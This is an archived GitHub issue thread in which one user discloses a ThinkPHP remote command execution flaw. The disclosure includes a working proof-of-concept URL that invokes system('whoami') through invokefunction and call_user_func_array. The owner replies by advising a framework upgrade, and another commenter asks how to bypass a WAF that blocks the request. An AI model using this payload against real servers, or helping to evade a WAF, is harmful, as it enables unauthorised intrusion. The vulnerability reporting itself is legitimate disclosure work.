Skip to content
This repository has been archived by the owner on Nov 12, 2022. It is now read-only.

There is A RCE vulnerability in your system. #33

Open
CCkiller opened this issue Jan 12, 2019 · 2 comments
Open

There is A RCE vulnerability in your system. #33

CCkiller opened this issue Jan 12, 2019 · 2 comments

Comments

@CCkiller
Copy link

The RCE(Remote Command Execution) vulnerability is triggered by a http request.Successfully executed the command "whoami".
poc:
http://58.82.XXX.XXX:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
default
default

@xyl-tools
Copy link
Owner

This is the official vulnerability of ThinkPHP, please upgrade the core framework to the latest version of the official.

@velocity16902
Copy link

hi,
Is there a way to bypass the waf? I get a 403 forbidden error.

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants